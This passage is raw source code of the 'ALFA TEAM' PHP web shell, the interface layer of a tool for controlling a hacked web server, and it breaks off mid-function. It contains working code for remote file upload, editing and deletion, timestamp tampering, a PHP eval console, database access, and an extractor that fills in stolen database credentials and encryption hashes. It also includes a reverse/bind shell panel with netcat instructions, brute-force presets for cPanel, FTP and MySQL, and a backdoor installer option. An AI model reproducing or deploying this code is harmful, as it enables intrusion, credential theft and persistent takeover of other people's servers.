ease-in-out;animation-iteration-count:2}.alfateam-loader-text{position:absolute;color:#46bb45;top:23%;left:49%;transform:translate(-50%,-50%);font-size:40px;letter-spacing:7px}.alfa-ajax-error{position:absolute;color:#ff0a0a;top:50%;left:50%;transform:translate(-50%,-50%);font-size:30px}.connection-hist-table{margin-left:auto;margin-right:auto;text-align:justify;border-collapse:collapse}.connection-hist-table td,.connection-hist-table th{border:1px solid #ddd;text-align:left;padding:8px}.connection-his-btn{margin-bottom:10px;padding:5px;background:#206920;color:#fff;border:none;outline:0;cursor:pointer;font-weight:700;transition:background .3s}.connection-his-btn.connection-delete{margin:unset;padding:5px;background:red;width:33px;border-radius:3px;transition:background .3s}.connection-delete:hover{background:#f56969!important}.connection-his-btn:hover{background:#30b330}#up_bar_holder{position:fixed;z-index:100000;width:100%}#filesman_tabs{padding:8px;border:1px solid #0e304a;color:#67abdf;overflow-x:auto;white-space:nowrap}.sortable-ghost{opacity:.5;background:#c8ebfb}.folder-tab-icon{width:16px!important}#filesman-tab-full-path{display:none;position:absolute;pointer-events:none;background:#163746;padding:7px;color:#0f0;border-radius:10px;min-width:58px;z-index:10}#filesman-tab-full-path::after{content:"";position:absolute;top:100%;left:35px;margin-left:-5px;border-width:5px;border-style:solid;pointer-events:none;border-color:#163746 transparent transparent transparent}.mysql-main{height:84vh;position:relative}.mysql-hide-content{display:none}.mysql-query-result-tabs{margin-bottom:10px;padding:3px;border-bottom:4px solid #0f304a}.mysql-main .tables-panel-ctl{position:absolute;color:#fff;padding:10px;z-index:1;border-radius:10px;top:45%;left:calc(17% + 10px);background-color:#009687;cursor:pointer}.tables-panel-ctl-min{left:-21px!important}.mysql-query-result-tabs div{display:inline-block;padding:5px;margin-right:2px;background:#133d51;color:#fff;cursor:pointer;transition:background-color .5s}.mysql-query-result-tabs div:hover{background-color:#a23939}.mysql-query-result-tabs div.mysql-query-selected-tab{background:red}table tr.tbl_row:nth-child(odd){background:#424040}.mysql-tables .tables-row{margin-left:26px}.mysql-main .mysql-query-results,.mysql-main .mysql-tables{float:left;height:100%;overflow:auto}.mysql-main .mysql-query-results{width:calc(80% + 4px);margin-left:5px;position:relative;overflow:unset}.mysql-main .mysql-query-results-fixed{width:100%}.mysql-main .mysql-query-results .mysql-query-content{height:89%;overflow:auto}.mysql-query-tab-hide{height:0!important;padding:0!important}.mysql-main .mysql-tables{width:19%;border-right:4px solid #0e304a}.mysql-main table td{vertical-align:top}.mysql-main .mysql-search-area table td{vertical-align:middle;padding:7px}.mysql-tables .block{position:relative;width:1.5em;height:1.5em;min-width:16px;min-height:16px;float:left}.mysql-tables div.block b,.mysql-tables div.block i{width:1.5em;height:1.7em;min-width:16px;min-height:8px;position:absolute;bottom:.7em;left:.75em;z-index:0}.mysql-tables .block i{display:block;border-left:1px solid #666;border-bottom:1px solid #666;position:relative;z-index:0}.mysql-tables .block b{display:block;height:.75em;bottom:0;left:.75em;border-left:1px solid #666}.mysql-tables div.block a,.mysql-tables div.block u{position:absolute;left:50%;top:50%;z-index:10}.mysql-tables div.block img{position:relative;top:-.6em;left:0;margin-left:-7px}.mysql-tables .clearfloat{clear:both}.mysql-tables ul{list-style-type:none;margin-left:0;padding:0}.mysql-tables ul li{white-space:nowrap;clear:both;min-height:16px}.mysql-tables .db_name{margin-left:10px}.mysql-tables .list_container{border-left:1px solid #666;margin-left:.75em;padding-left:.75em}.hide-db-tables{display:none}.mysql-main:after{content:"";display:table;clear:both}table.mysql-data-tbl{border:none!important;border-collapse:collapse!important}table.mysql-data-tbl tr th{padding:5px}table.mysql-data-tbl td{border-left:3px solid #305a8d;border-right:3px solid #305a8d;padding:6px}table.mysql-data-tbl td:first-child{border-left:none}table.mysql-data-tbl td:last-child{border-right:none}.mysql-insert-result,.mysql-structure-qres,.mysql-update-result{display:none;text-align:center;padding:10px;border:1px dashed;margin:22px}#alfa-copyright{margin-top:15px}.ic_b_plus{background-image:url(http://solevisible.com/icons/menu/b_plus.png)}.ic_b_minus{background-image:url(http://solevisible.com/icons/menu/b_minus.png)}
<?php echo '
@keyframes spin {from {transform: rotate(0deg);}to{transform: rotate(360deg);}}
@-webkit-keyframes spin {from {-webkit-transform: rotate(0deg);}to {-webkit-transform: rotate(360deg);}}
@-moz-keyframes spin {from {-moz-transform: rotate(0deg);}to {-moz-transform: rotate(360deg);}}
@-ms-keyframes spin {from {-ms-transform: rotate(0deg);}to {-ms-transform: rotate(360deg);}}
#alfaloader{'.$csscode.'width:100px;height:100px;}
#a_loader img{'.$csscode.'width:150px;height:150px;position:fixed;z-index:999999;top: 31%;left: 45%;}
.ajaxarea{display:none;border:1px solid #0E304A;color:#67ABDF}.up_bar{margin-bottom: 2px;transition:width 2s;background-color:red;width:0;height:8px;display:none;}#hidden_sh{background-color:#0E304A;text-align:center;position:absolute;right:0;left:90%;border-bottom-left-radius:2em}.alert_green{color:#0F0;font-family:"Comic Sans MS";font-size:small;text-decoration:none}.whole{background-color:#000;background-image:url(http://solevisible.com/images/alfabg.png);background-position:center;background-attachment:fixed;background-repeat:no-repeat}.header{height:auto;width:auto;border:7px solid #0E304A;color:'.alfa_getColor("header_values").';font-size:12px;font-family:Verdana,Geneva,sans-serif}.header a{text-decoration:none;}.filestools a{color:#0F0;text-decoration:none}.filestools a:hover{color:#FFF;text-decoration:none;}span{font-weight:bolder;color:#FFF}.txtfont{font-family:"Comic Sans MS";font-size:small;color:#fff;display:inline-block}.txtfont_header{font-family:"Comic Sans MS";font-size:large;display:inline-block;color:#59cc33}.tbltxt{font-family:"Comic Sans MS";color:#fff;font-size:small;display:inline-block}input[type="file"]{display:none}.inputfile{border:1px solid #0E304A;background:transparent;box-shadow:0 0 4px #0E304A;border-radius:4px;height:20px;width:250px;text-overflow:ellipsis;white-space:nowrap;cursor:pointer;display:inline-block;overflow:hidden}.inputfile:hover{box-shadow:0 0 4px #27979B;border:1px solid #27979B;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}.inputfile span,.inputfile strong{padding:2px;padding-left:10px}.inputfile span{color:#25ff00;width:90px;min-height:2em;display:inline-block;text-overflow:ellipsis;white-space:nowrap;overflow:hidden;vertical-align:top;float:left}.inputfile strong{background-image:url('.__showicon('alfamini').');background-repeat:no-repeat;background-position:float;height:100%;width:109px;color:#fff;background-color:#0E304A;display:inline-block;float:right}.inputfile:focus strong,.inputfile.has-focus strong,.inputfile:hover strong{background-color:#46647A}.button{padding:3px}#addup,.button{outline:none;cursor:pointer;border:1px solid #0E304A;background:transparent;box-shadow:0 0 4px #0E304A;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:100px;-webkit-box-shadow:#555 0 0 4px;-moz-box-shadow:#555 0 0 4px;background-color:#000;color:green;border-radius:100px}#addup:hover,.button:hover{box-shadow:0 0 4px #27979B;border:1px solid #27979B;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:100px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}input[type=text]:disabled:hover{cursor:not-allowed}td{padding:'.($GLOBALS['DB_NAME']['show_icons']=='1'?'0':'1').'px}.myCheckbox{padding-left:2px}.myCheckbox label{display:inline-block;cursor:pointer;position:relative}.myCheckbox input[type=checkbox]{display:none}.myCheckbox label:before{content:"";display:inline-block;width:14px;height:13px;position:absolute;background-color:#aaa;box-shadow:inset 0 2px 3px 0 rgba(0,0,0,.3),0 1px 0 0 rgba(255,255,255,.8)}.myCheckbox label{margin-bottom:15px;padding-right:17px}.myCheckbox label:before{border-radius:100px}input[type=checkbox]:checked + label:before{content:"";background-color:#0E304A;background-image:url('.__showicon('alfamini').');background-repeat:no-repeat;background-position:50% 50%;background-size:14px 14px;box-shadow:0 0 4px #0F0}#meunlist{font-family:Verdana,Geneva,sans-serif;color:#FFF;width:auto;border-right-width:7px;border-left-width:7px;height:auto;font-size:12px;font-weight:700;border-top-width:0;border-color:#0E304A;border-style:solid}.whole #meunlist ul{text-align:center;list-style-type:none;margin:0;padding:5px 5px 7px 2px}.whole #meunlist li{margin:0;padding:0;display:inline}.whole #meunlist a{font-family:arial,sans-serif;font-size:14px;text-decoration:none;font-weight:700;clear:both;width:100px;margin-right:-6px;border-right-width:1px;border-right-style:solid;border-right-color:#FFF;padding:3px 15px}.foot{font-family:Verdana,Geneva,sans-serif;margin:0;padding:0;width:100%;text-align:center;font-size:12px;color:#0E304A;border-right-width:7px;border-left-width:7px;border-bottom-width:7px;border-bottom-style:solid;border-right-style:solid;border-right-style:solid;border-left-style:solid;border-color:#0E304A}#text{text-align:center}input[type=submit]{cursor:pointer;background-image:url('.__showicon('btn').');background-repeat:no-repeat;background-position:50% 50%;background-size:23px 23px;background-color:#000;width:30px;height:30px;border:1px solid #27979B;border-radius:100px}textarea{padding:3px;color:#999;text-shadow:#777 0 0 3px;border:1px solid #0E304A;background:transparent;box-shadow:0 0 4px #0E304A;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:#555 0 0 4px;-moz-box-shadow:#555 0 0 4px}textarea:hover{color:#FFF;text-shadow:#060 0 0 6px;box-shadow:0 0 4px #27979B;border:1px solid #27979B;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}input[type=text],input[type=number],.alfa_custom_cmd_btn{padding:3px;color:#999;text-shadow:#777 0 0 3px;border:1px solid #0E304A;background:transparent;box-shadow:0 0 4px #0E304A;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:#555 0 0 4px;-moz-box-shadow:#555 0 0 4px}input[type=submit]:hover{color:#000;text-shadow:#060 0 0 6px;box-shadow:0 0 4px #27979B;border:2px solid #27979B;-moz-border-radius:4px;border-radius:100px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}input[type=text]:hover{color:#FFF;text-shadow:#060 0 0 6px;box-shadow:0 0 4px #27979B;border:1px solid #27979B;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}select{padding:3px;width:162px;color:#FFE;text-shadow:#000 0 2px 7px;border:1px solid #0E304A;background:#000;text-decoration:none;box-shadow:0 0 4px #0E304A;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:#555 0 0 4px;-moz-box-shadow:#555 0 0 4px}select:hover{border:1px solid #27979B;box-shadow:0 0 4px #27979B;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}
.foottable{width: 300px;font-weight: bold;'.(!@is_writable($GLOBALS['cwd'])?'}.dir{background-color:red;}':'}').'.main th{text-align:left;}.main a{color: #FFF;}.main tr:hover{background-color:#646464 !important;}.ml1{ border:1px solid #0E304A;padding:5px;margin:0;overflow: auto; }.bigarea{ width:99%; height:300px; }.alfa_custom_cmd_btn {padding: 5px;color: #24ff03;cursor: pointer;}.ajaxarea.filesman-active-content {display: block;}'.alfaCssLoadColors().'
</style>';
echo "<script type='text/javascript'>
var c_ = '" . htmlspecialchars($GLOBALS['cwd']) . "';
var a_ = '" . htmlspecialchars(@$_POST['a']) ."';
var charset_ = '" . htmlspecialchars(@$_POST['charset']) ."';
var islinux = ".($GLOBALS['sys']!="win"?'true':'false').";
var post_encryption_mode = ".(__ALFA_POST_ENCRYPTION__?'true':'false').";";?>
var alfa1_="",alfa2_="",alfa3_="",alfa4_="",alfa5_="",alfa6_="",alfa7_="",alfa8_="",alfa9_="",alfa10_="",d=document,mysql_cache={},editor_files={},editor_error=!0,editor_current_file="",php_temrinal_using_cgi=!1,is_minimized=!1,cgi_is_minimized=!1,options_window_is_minimized=!1,database_window_is_minimized=!1,rightclick_menu_context=null,can_hashchange_work=!0,alfa_can_add_opt=!1,alfa_before_do_action_id="",alfa_ace_editors={editor:null,eval:null},col_dumper_selected_data={},_ALFA_AJAX_={},cgi_lang="",upcount=1,terminal_walk_index=[],alfa_current_fm_id=1,alfa_fm_id=0;function set(e,a,t,i,l,o,r,n,s,c,f,_,u){d.mf.a.value=null!=e?e:a_,d.mf.c.value=null!=a?a:c_,d.mf.alfa1.value=null!=t?t:"",d.mf.alfa2.value=null!=i?i:"",d.mf.alfa3.value=null!=l?l:"",d.mf.alfa4.value=null!=o?o:"",d.mf.alfa5.value=null!=r?r:"",d.mf.alfa6.value=null!=n?n:"",d.mf.alfa7.value=null!=s?s:"",d.mf.alfa8.value=null!=c?c:"",d.mf.alfa9.value=null!=f?f:"",d.mf.alfa10.value=null!=_?_:"",d.mf.charset.value=null!=u?u:charset_}function fc(e){var a=alfa_current_fm_id,t="a="+alfab64("FilesMan")+"&c="+alfab64(e.c.value)+"&alfa1="+alfab64(e.alfa1.value)+"&ajax="+alfab64("true")+"&",i="",l=0;if(d.querySelectorAll("#filesman_holder_"+a+" form[name=files] input[type=checkbox]").forEach(function(e){e.checked&&(l++,i+="f[]="+alfab64(decodeURIComponent(e.value))+"&")}),0==l&&"paste"!=e.alfa1.value)return!1;switch(alfaloader("filesman_holder_"+a,"block"),e.alfa1.value){case"delete":d.querySelectorAll("#filesman_holder_"+a+" .fmanager-row").forEach(function(e){var a=e.querySelector("input[type=checkbox]");a.checked&&".."!=a.value?e.remove():a.checked=!1}),d.querySelector("#filesman_holder_"+a+" .chkbx").checked=!1;break;case"copy":case"move":case"zip":case"unzip":d.querySelectorAll("#filesman_holder_"+a+" input[type=checkbox]:checked").forEach(function(e){e.checked=!1})}_Ajax(d.URL,t+i,function(e){alfaloader("filesman_holder_"+a,"none"),alfaFmngrContextRow()},!1,"filesman_holder_"+a)}function initDir(e){var a="",t="";islinux&&(a="<a class=\"header_pwd\" onclick=\"g('FilesMan','/');\" path='/' href='#action=fileman&path=/'>/</a>",t="/");var l=e.split("/"),o="",r=islinux?"/":"";for(i in"-1"!=l.indexOf("..")&&(l.splice(l.indexOf("..")-1,1),l.splice(l.indexOf(".."),1)),l)""!=l[i]&&(o+="<a onclick=\"g('FilesMan','"+r+l[i]+"/');\" path='"+r+l[i]+"/' href='#action=fileman&path="+r+l[i]+'/\' class="header_pwd">'+l[i]+"/</a>",r+=l[i]+"/");$("header_cwd").innerHTML=a+o+" ",alfaInitCwdContext(),l=(l=t+l.join("/")).replace("//","/"),d.footer_form.c.value=l,$("footer_cwd").value=l,c_=l}function evalJS(html){var newElement=document.createElement("div");newElement.innerHTML=html;for(var scripts=newElement.getElementsByTagName("script"),i=0;i<scripts.length;++i){var script=scripts[i];eval(script.innerHTML)}}function _Ajax(e,a,t,i,l){var o=!1;return window.XMLHttpRequest?o=new XMLHttpRequest:window.ActiveXObject&&(o=new ActiveXObject("Microsoft.XMLHTTP")),void 0!==l&&(_ALFA_AJAX_[l]=o),o?(o.onreadystatechange=function(){4==o.readyState&&200==o.status?"function"==typeof t&&(t(o.responseText,l),alfaClearAjax(l)):4==o.readyState&&200!=o.status&&(alfaAjaxError(o.status,l,o.statusText,o.responseText),alfaClearAjax(l))},o.open("POST",e,!0),o.setRequestHeader("Content-Type","application/x-www-form-urlencoded"),void o.send(a)):void alert("Error !")}function alfaClearAjax(e){_ALFA_AJAX_.hasOwnProperty(e)&&delete _ALFA_AJAX_[e]}function handleup(e,a){var t="__fnameup";if(0!=a&&(t="__fnameup"+a),e.files.length>1){for(var i="",l=0;l<e.files.length;l++)i+=e.files[0].name+", ";$(t).innerHTML=i}else e.files[0].name&&($(t).innerHTML=e.files[0].name)}function u(e){var a=!1,t=0,i=alfa_current_fm_id,l=new FormData,o="filesman_holder_"+i;l.append("a",alfab64(e.a.value)),l.append("c",alfab64(e.c.value)),l.append("alfa1",alfab64(e.alfa1.value)),l.append("charset",alfab64(e.charset.value)),l.append("ajax",alfab64(e.ajax.value)),e.querySelectorAll("input[type=file]").forEach(function(e){if(0==e.value.length)return!1;if(e.files.length>1)for(var a=0;a<e.files.length;a++)l.append("f[]",e.files[a]);else l.append("f[]",e.files[0]);t++}),$("footerup").value="",$("__fnameup").innerHTML="";for(var r=1;r<=upcount;r++){var n=$("pfooterup_"+r);n&&n.parentNode.removeChild(n),upcount--}if(0==upcount&&upcount++,0==t)return!1;var s="up_bar_"+getRandom();$("up_bar_holder").insertAdjacentHTML("beforeend","<div id='"+s+"' class='up_bar'></div>");e.c.value;if(window.XMLHttpRequest?a=new XMLHttpRequest:window.ActiveXObject&&(a=new ActiveXObject("Microsoft.XMLHTTP")),a){var c=$(s);_ALFA_AJAX_[s]=a,a.upload&&(c.style.display="block",a.upload.onprogress=function(e){var a=e.position||e.loaded,t=e.totalSize||e.total,i=Math.floor(a/t*1e3)/10+"%";c.style.width=i}),a.onload=function(e){200===a.status?c.style.display="none":alfaAjaxError(a.status,"upload_area",a.statusText,a.responseText),alfaClearAjax(s)},a.onreadystatechange=function(){if(4==a.readyState&&200==a.status){if("noperm"!=a.responseText&&"[]"!=a.responseText){var e,t=JSON.parse(a.responseText),l="",r=d.querySelectorAll("#"+o+" #filemanager_table tr").length-3;for(e in t){++r;var n=t[e].name,s=encodeURIComponent(n),c=t[e].size,f=t[e].perm,_=t[e].modify,u=t[e].owner,p=loadType(n,"file");try{d.querySelector("#"+o+" .fmanager-row a[fname='"+n+"']").parentElement.parentElement.parentElement.remove()}catch(e){}l+='<tr class="fmanager-row" id="tr_row_'+r+'"><td><div class="myCheckbox"><input type="checkbox" name="f[]" value="'+n+'" class="chkbx" id="checkbox'+r+'"><label for="checkbox'+r+'"></label></div></td><td id="td_row_'+r+'">'+p+'<div style="position:relative;display:inline-block;bottom:12px;"><a row="'+r+'" id="id_'+r+'" class="main_name" onclick="editor(\''+s+"','auto','','','','file');\" href=\"#action=fileman&amp;path="+c_+"&amp;file="+s+'" fname="'+n+'" ftype="file" path="'+c_+'" opt_title="">'+n+'</a></div></td><td><span style="font-weight:unset;" class="main_size">'+c+'</span></td><td><span style="font-weight:unset;" class="main_modify">'+_+'</span></td><td><span style="font-weight:unset;" class="main_owner_group">'+u+'</span></td><td><a id="id_chmode_'+r+'" href="javascript:void(0)" onclick="editor(\''+s+"','chmod','','','','file')\">"+f+'</a></td><td><a id="id_rename_'+r+'" title="Rename" class="actions" href="javascript:void(0);" onclick="editor(\''+s+"', 'rename','','','','file')\">R</a> <a id=\"id_touch_"+r+'" title="Modify Datetime" class="actions" href="javascript:void(0);" onclick="editor(\''+s+"', 'touch','','','','file')\">T</a> <a id=\"id_edit_"+r+'" class="actions" title="Edit" href="javascript:void(0);" onclick="editor(\''+s+"', 'edit','','','','file')\">E</a> <a id=\"id_download_"+r+'" title="Download" class="actions" href="javascript:void(0);" onclick="g(\'FilesTools\',null,\''+n+"', 'download')\">D</a><a id=\"id_delete_"+r+'" title="Delete" class="actions" href="javascript:void(0);" onclick="var chk = confirm(\'Are You Sure For Delete # '+s+" # ?'); chk ? g('FilesMan',null,'delete', '"+s+"') : '';\"> X </a></td></tr>"}d.querySelector("#"+o+" #filemanager_last_tr").insertAdjacentHTML("beforebegin",l),alfaShowNotification("File(s) uploaded successfully","Uploader"),alfaFmngrContextRow()}else alfaShowNotification("Folder has no permission...","Uploader","error");alfaCheckCurrentFilesManTab(i)}},a.open("POST",d.URL),a.send(l)}}function alfaCheckCurrentFilesManTab(e){-1==$("filesman_tab_"+e).classList.value.indexOf("filesman-tab-active")&&$("filesman_tab_"+e).classList.add("tab-is-done")}function g(a,c,alfa1,alfa2,alfa3,alfa4,alfa5,alfa6,alfa7,alfa8,alfa9,alfa10,charset){var fm_id=0==alfa_fm_id?alfa_current_fm_id:alfa_fm_id,fm_id2=alfa_fm_id,fm_path=null==c||0==c.length?c_:c,d_mf_c=fm_path,g_action_id=alfa_before_do_action_id;0==alfa_fm_id&&(set(a,c,alfa1,alfa2,alfa3,alfa4,alfa5,alfa6,alfa7,alfa8,alfa9,alfa10,charset),d_mf_c=d.mf.c.value),"GetConfig"!=a&&"download"!=alfa2&&islinux&&"/"!=d_mf_c.substr(0,1)&&(d_mf_c="/"+d_mf_c),"FilesMan"==a?(alfaloader("filesman_holder_"+fm_id,"block"),g_action_id="filesman_holder_"+fm_id):""!=g_action_id?alfaloader(g_action_id,"block"):"FilesTools"!=a&&"download"!=alfa2&&"GetConfig"!=a&&("sql"==a?(showEditor("database_window"),g_action_id=loadPopUpDatabase("")):"FilesMan"!=a&&(showEditor("options_window"),g_action_id=loadPopUpOpTions(a)),alfaloader(g_action_id,"block"));for(var data="a="+alfab64(a)+"&c="+alfab64(d_mf_c)+"&",i=1;i<=10;i++)data+="alfa"+i+"="+alfab64(eval("d.mf.alfa"+i+".value"))+"&";if("FilesMan"==a){var pagenum=d.querySelector("#"+g_action_id+" .page-number.active-page-number");null!=pagenum&&(data+="pagenum="+alfab64(getCookie(g_action_id+"_page_number")),setCookie(g_action_id+"_page_number",1,2012))}if(data+="&ajax="+alfab64("true"),"FilesTools"==a&&"download"==alfa2){alfaLoaderOnTop("none");var dl=$("dlForm");return dl.a.value=alfab64("dlfile"),dl.c.value=alfab64(d_mf_c),dl.file.value=alfab64(alfa1),void dl.submit()}"GetConfig"!=a?(_Ajax(d.URL,data,function(e,t){evalJS(e);var i=!1;if(alfaLoaderOnTop("none"),"sql"==a)return console.log(t),loadPopUpDatabase(e,t),!1;if("FilesMan"==a){alfaloader("filesman_holder_"+fm_id,"none"),d.querySelector("#filesman_holder_"+fm_id).innerHTML=e,fm_path=fm_path.replace(/\/\//g,"/"),$("filesman_tab_"+fm_id).setAttribute("path",fm_path);var l=alfaGetLastFolderName(fm_path);d.querySelector("#filesman_tab_"+fm_id+" span").innerHTML=l,alfaFmngrContextRow(),"function"==typeof alfa1&&alfa1(e),alfaCheckCurrentFilesManTab(fm_id)}else(options_window_is_minimized||"."==t.substr(0,1))&&"."==t.substr(0,1)&&(i=!0,t=t.substr(1),showEditor("options_window")),i||alfaloader(t,"none"),loadPopUpOpTions(t,e),"phpeval"==a&&alfaLoadAceEditor("PhpCode"),"coldumper"==a.substr(0,9)&&alfaColDumperInit()},!1,""==g_action_id?"."+a:g_action_id),g_action_id="",0==fm_id2&&c!=c_&&c&&initDir(c)):(alfaloader(alfa3,"block"),_Ajax(d.URL,data,function(e,a){var t=a;a=d.querySelector("#"+("id_db"!=a.substr(0,5)?"option_"+a:a));try{(e=JSON.parse(e)).host&&e.user&&e.dbname&&($("db_host")&&(a.querySelector("#db_host").value=e.host),$("db_user")&&(a.querySelector("#db_user").value=e.user),$("db_name")&&(a.querySelector("#db_name").value=e.dbname),$("db_pw")&&(a.querySelector("#db_pw").value=e.password),$("db_prefix")&&e.prefix&&(a.querySelector("#db_prefix").value=e.prefix),$("cc_encryption_hash")&&e.cc_encryption_hash&&(a.querySelector("#cc_encryption_hash").value=e.cc_encryption_hash))}catch(e){}alfaloader(t,"none")},!1,alfa3))}function alfaGetLastFolderName(e){var a=e.replace(/\/\//g,"/").split("/");for(var t in a)0==a[t].length&&a.splice(t,1);var i=a[a.length-1];return 0==i.length&&(i="/"),i}function alfaloader(e,a){if(0==e.length)return!1;try{var t=$("loader_"+e);if(null==t&&"block"==a){var i=null;"editor"==e?i=d.querySelector("#editor .editor-modal"):"id_db"==e.substr(0,5)?i=$(e):"terminal_id"==e.substr(0,11)?i=$(e):"editor"==e.substr(0,6)?i=$(e):"cgiframe"==e?i=$("cgiframe"):"filesman_holder"==e.substr(0,15)?(i=$(e)).style.minHeight="300px":i=$("option_"+e),i.insertAdjacentHTML("afterbegin","<div id='loader_"+e+'\' class="options-loader-holder"><div parent="'+e+'" onclick="alfaAjaxController(this);" class="stopAjax">[ Stop it ]</div><div class="alfateam-loader-text">ALFA TEAM</div><div class="alfa-ajax-error"></div><img src=\'http://solevisible.com/images/loader.svg\'></div>')}else"filesman_holder"==e.substr(0,15)&&($(e).style.minHeight="0"),null!=t&&(t.style.display=a)}catch(e){}}function fs(e){var a=e.getAttribute("db_id"),t=d.querySelector("#"+a+" div.sf");mysql_cache.hasOwnProperty(a)||(mysql_cache[a]={}),alfaloader(a,"block");var i=t.querySelector("input[name=sql_host]").value,l=t.querySelector("input[name=sql_login]").value,o=t.querySelector("input[name=sql_pass]").value,r=t.querySelector("input[name=sql_base]")?t.querySelector("input[name=sql_base]").value:t.querySelector("select[name=sql_base]").value,n=t.querySelector("select[name=type]").value,s=t.querySelector("input[name=sql_count]").checked?"true":"";_Ajax(d.URL,"a="+alfab64("Sql")+"&alfa1="+alfab64("query")+"&alfa2=&c="+alfab64(c_)+"&charset="+alfab64("UTF-8")+"&type="+alfab64(n)+"&sql_host="+alfab64(i)+"&sql_login="+alfab64(l)+"&sql_pass="+alfab64(o)+"&sql_base="+alfab64(r)+"&sql_count="+alfab64(s)+"&current_mysql_id="+alfab64(a)+"&ajax="+alfab64("true"),function(e,a){loadPopUpDatabase(e,a),evalJS(e),alfaloader(a,"none")},!1,a)}function ctlbc(e){var a=$("bcStatus"),t=$("bcipAction");"bind"==e.value?(t.style.display="none",a.innerHTML="<small>Press ` <font color='red'>>></font> ` button and run ` <font color='red'>nc server_ip port</font> ` on your computer</small>"):(t.style.display="inline-block",a.innerHTML="<small>Run ` <font color='red'>nc -l -v -p port</font> ` on your computer and press ` <font color='red'>>></font> ` button</small>")}function $(e){return d.getElementById(e)}function addnewup(){var e="footerup_"+upcount,a="pfooterup_"+upcount,t=1!=upcount?"pfooterup_"+(upcount-1):"pfooterup",i=d.createElement("p");i.innerHTML='<label class="inputfile" for="'+e+'"><span id="__fnameup'+upcount+'"></span> <strong>&nbsp;&nbsp;Choose a file</strong></label><input id="'+e+'" type="file" name="f[]" onChange="handleup(this,'+upcount+');" multiple>',i.id=a,i.appendAfter($(t)),upcount++}function alfa_searcher_tool(e){switch(e){case"all":case"dirs":_alfaSet(!0,"Disabled");break;case"files":_alfaSet(!1,"php")}}function _alfaSet(e,a){d.srch.ext.disabled=e,d.srch.ext.value=a}function dis_input(e){switch(e){case"phpmyadmin":bruteSet(!0,"Disabled","http://");break;case"direct":bruteSet(!1,"2222","http://");break;case"cp":bruteSet(!1,"2082","http://");break;case"ftp":bruteSet(!0,"Disabled","ftp://");break;case"mysql":bruteSet(!1,"3306","http://");break;case"ftpc":bruteSet(!1,"21","http://")}}function bruteSet(e,a,t){c="21"!=a?"localhost":"ftp.example.com",$("port").disabled=e,$("port").value=a,$("target").value=c,$("protocol").value=t}function inBackdoor(e){"my"==e.value?$("backdoor_textarea").style.display="block":$("backdoor_textarea").style.display="none"}function saveByKey(e){return!("s"==String.fromCharCode(e.which).toLowerCase()&&e.ctrlKey||19==e.which)||($("editor_edit_area").onsubmit(),e.preventDefault(),!1)}function alfaAjaxError(e,a,t,i){if(void 0!==a){var l=d.querySelector("#loader_"+a);null!=l&&(firewall="",403==e&&(firewall=" ~ FireWall Detected!"),l.querySelector("img").remove(),l.querySelector(".alfa-ajax-error").innerHTML=e+" ( "+t+firewall+" )",alfaShowNotification(t,"Ajax","error"))}}function alfaInitCwdContext(){d.querySelectorAll(".header_pwd").forEach(function(e){e.addEventListener("contextmenu",function(e){var a=e.target.getAttribute("path"),t=d.querySelector("#rightclick_menu > a[name=newtab]");t.setAttribute("href","javascript:void(0);"),t.removeAttribute("target"),t.onclick=function(){alfaFilesManNewTab(a,"/")};var i=e.clientX,l=e.clientY;alfaSortMenuItems(["newtab"]),alfaRightClickMenu(i,l),e.preventDefault()})})}function alfaRightClickMenu(e,a){rightclick_menu_context.top=a+"px",rightclick_menu_context.left=e+"px",rightclick_menu_context.visibility="visible",rightclick_menu_context.opacity="1"}function alfaSortMenuItems(e){var a=["newtab","link","download","view","edit","move","copy","rename","modify","permission","compress","extract","delete","view_archive"],t=!1;for(var i in a){for(var l in t=!1,e)a[i]!=e[l]||(d.querySelector("#rightclick_menu > a[name="+a[i]+"]").style.display="block",t=!0);t||(d.querySelector("#rightclick_menu > a[name="+a[i]+"]").style.display="none")}}function alfaAceChangeSetting(e,a){var t=e.options[e.selectedIndex].value,i=e.getAttribute("base"),l=alfa_ace_editors.editor;"eval"==i&&(l=alfa_ace_editors.eval);var o=e.getAttribute("ace_id");"lang"==a?l[o].session.setMode("ace/mode/"+t):"theme"==a&&l[o].setTheme("ace/theme/"+t),setCookie("alfa_ace_"+a+"_"+i,t,2012)}function alfaAceChangeWrapMode(e,a){var t=alfa_ace_editors.editor;"eval"==a&&(t=alfa_ace_editors.eval);var i=e.getAttribute("ace_id");e.checked?t[i].session.setUseWrapMode(!0):t[i].session.setUseWrapMode(!1)}function alfaAceChangeFontSize(e,a,t){var i=alfa_ace_editors.editor;"eval"==e&&(i=alfa_ace_editors.eval);var l=t.getAttribute("ace_id"),o=i[l].getFontSize();"+"==a?++o:--o,i[l].setFontSize(o),setCookie("alfa_ace_fontsize_"+e,o,2012)}function setCookie(e,a,t){var i=new Date;i.setTime(i.getTime()+24*t*60*60*1e3);var l="expires="+i.toUTCString();document.cookie=e+"="+a+";"+l+";path=/"}function getCookie(e){var a=("; "+document.cookie).split("; "+e+"=");if(2==a.length)return a.pop().split(";").shift()}function editorClose(e){if(d.body.style.overflow="visible",elem=$(e),elem.setAttribute("class","editor-anim-close"),"editor"==e){if(is_minimized=!1,null!=alfa_ace_editors.editor&&null!=alfa_ace_editors.editor){for(var a in 